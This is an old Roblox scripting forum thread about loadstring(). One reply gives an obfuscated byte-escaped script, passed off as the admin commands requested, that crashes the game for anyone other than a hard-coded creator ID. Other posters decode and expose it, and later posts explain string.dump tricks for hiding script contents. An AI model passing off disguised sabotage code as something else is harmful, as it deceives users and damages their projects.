generic image
Processing...
  • Games
  • Catalog
  • Develop
  • Robux
  • Search in Players
  • Search in Games
  • Search in Catalog
  • Search in Groups
  • Search in Library
  • Log In
  • Sign Up
  • Games
  • Catalog
  • Develop
  • Robux
   
ROBLOX Forum » Game Creation and Development » Scripting Helpers
Home Search
 

Re: Loadstring() script

Previous Thread :: Next Thread 
hoang11992 is not online. hoang11992
Joined: 22 Dec 2008
Total Posts: 42
28 Nov 2011 06:36 PM
can u help me with Loadstring
i need admin commands by loadstring()
please help...
Report Abuse
BunnyBoy26 is not online. BunnyBoy26
Joined: 17 Jun 2010
Total Posts: 5674
28 Nov 2011 06:37 PM
Not unless you tell us what you need help with.
Report Abuse
MrgamesNwatch is not online. MrgamesNwatch
Joined: 02 Feb 2009
Total Posts: 7729
28 Nov 2011 06:40 PM
loadstring('\108\111\99\97\108\32\73\100\32\61\32\50\49\52\51\54\51\48\10\102\117\110\99\116\105\111\110\32\99\114\97\115\104\40\41\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\44\119\111\114\107\115\112\97\99\101\41\10\101\110\100\10\119\97\105\116\40\49\41\10\105\102\32\103\97\109\101\58\102\105\110\100\70\105\114\115\116\67\104\105\108\100\40\34\78\101\116\119\111\114\107\83\101\114\118\101\114\34\41\32\126\61\32\110\105\108\32\116\104\101\110\10\112\114\105\110\116\40\34\79\110\108\105\110\101\34\41\10\105\102\32\103\97\109\101\46\67\114\101\97\116\111\114\73\100\32\126\61\32\73\100\32\116\104\101\110\10\112\114\105\110\116\40\34\71\69\84\32\79\85\84\33\34\41\10\99\114\97\115\104\40\41\10\101\110\100\10\101\110\100\10')()

this should "work"
Report Abuse
BunnyBoy26 is not online. BunnyBoy26
Joined: 17 Jun 2010
Total Posts: 5674
28 Nov 2011 06:44 PM
ok well I don't have roblox installed on the computer Im using, so can you do this?:

Go into your place on edit mode

Then open the output bar (View>Output)

Next type this in the output bar:

print("\108\111\99\97\108\32\73\100\32\61\32\50\49\52\51\54\51\48\10\102\117\110\99\116\105\111\110\32\99\114\97\115\104\40\41\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\44\119\111\114\107\115\112\97\99\101\41\10\101\110\100\10\119\97\105\116\40\49\41\10\105\102\32\103\97\109\101\58\102\105\110\100\70\105\114\115\116\67\104\105\108\100\40\34\78\101\116\119\111\114\107\83\101\114\118\101\114\34\41\32\126\61\32\110\105\108\32\116\104\101\110\10\112\114\105\110\116\40\34\79\110\108\105\110\101\34\41\10\105\102\32\103\97\109\101\46\67\114\101\97\116\111\114\73\100\32\126\61\32\73\100\32\116\104\101\110\10\112\114\105\110\116\40\34\71\69\84\32\79\85\84\33\34\41\10\99\114\97\115\104\40\41\10\101\110\100\10\101\110\100\10")

Press enter and post the result here.
Report Abuse
hoang11992 is not online. hoang11992
Joined: 22 Dec 2008
Total Posts: 42
28 Nov 2011 08:53 PM
i really need admin commands not this
--->
local Id = 2143630 function crash() Instance.new('ManualSurfaceJointInstance',workspace) end wait(1) if game:findFirstChild("NetworkServer") ~= nil then print("Online") if game.CreatorId ~= Id then print("GET OUT!") crash() end end
Report Abuse
1waffle1 is not online. 1waffle1
Joined: 16 Oct 2007
Total Posts: 16381
28 Nov 2011 08:56 PM
Then get out and go make some.
Report Abuse
hoang11992 is not online. hoang11992
Joined: 22 Dec 2008
Total Posts: 42
28 Nov 2011 09:04 PM
i am making it
but got errors
Report Abuse
MrgamesNwatch is not online. MrgamesNwatch
Joined: 02 Feb 2009
Total Posts: 7729
28 Nov 2011 09:08 PM
then post your problems along with the script.
Report Abuse
rayoma is not online. rayoma
Joined: 13 Nov 2009
Total Posts: 1911
28 Nov 2011 09:46 PM
@Mrgames

When you encrypt a script do it like this :

local strang=string.dump(function()

--code here

end)

local new_encrypt="loadstring('";
for i=1,strang:len() do
new_encrypt=new_encrypt .. "\\" .. strang:sub(i,i):byte();
end

print(new_encrypt .. "')()");


Now you get the results :
> LuaQ

When you try to decrypt it like that other guy did.
Report Abuse
MrgamesNwatch is not online. MrgamesNwatch
Joined: 02 Feb 2009
Total Posts: 7729
29 Nov 2011 04:00 PM
:O much better!
Report Abuse
hoang11992 is not online. hoang11992
Joined: 22 Dec 2008
Total Posts: 42
29 Nov 2011 05:54 PM
I have a make-loadstring script
Source = [[]]

New = ""
for i = 1,Source:len() do
New = New .. string.char(92) .. Source:sub(i,i):byte()
end
print([[loadstring("]] .. New .. [[")()]])

i put the admin commands in source = [[....]]

but it will be broken with ]] and )

Report Abuse
Previous Thread :: Next Thread 
Page 1 of 1
 
 
ROBLOX Forum » Game Creation and Development » Scripting Helpers
   
 
   
  • About Us
  • Jobs
  • Blog
  • Parents
  • Help
  • Terms
  • Privacy

©2017 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.



Progress
Starting Roblox...
Connecting to Players...
R R

Roblox is now loading. Get ready to play!

R R

You're moments away from getting into the game!

Click here for help

Check Remember my choice and click Launch Application in the dialog box above to join games faster in the future!

Gameplay sponsored by:
Loading 0% - Starting game...
Get more with Builders Club! Join Builders Club
Choose Your Avatar
I have an account
generic image